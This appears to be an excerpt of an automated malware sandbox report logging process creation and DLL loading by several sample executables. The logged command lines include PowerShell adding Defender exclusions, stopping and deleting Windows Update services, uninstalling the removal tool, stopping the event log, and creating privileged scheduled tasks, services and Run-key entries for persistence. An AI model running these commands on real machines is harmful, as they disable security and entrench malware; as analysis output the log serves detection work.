Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe"
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"
Source: unknown	Process created: C:\Users\user\Desktop\F4R5fd8grr.exe C:\Users\user\Desktop\F4R5fd8grr.exe
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "WAGDKRVZ"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "WAGDKRVZ"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "WAGDKRVZ"	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "WAGDKRVZ"	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
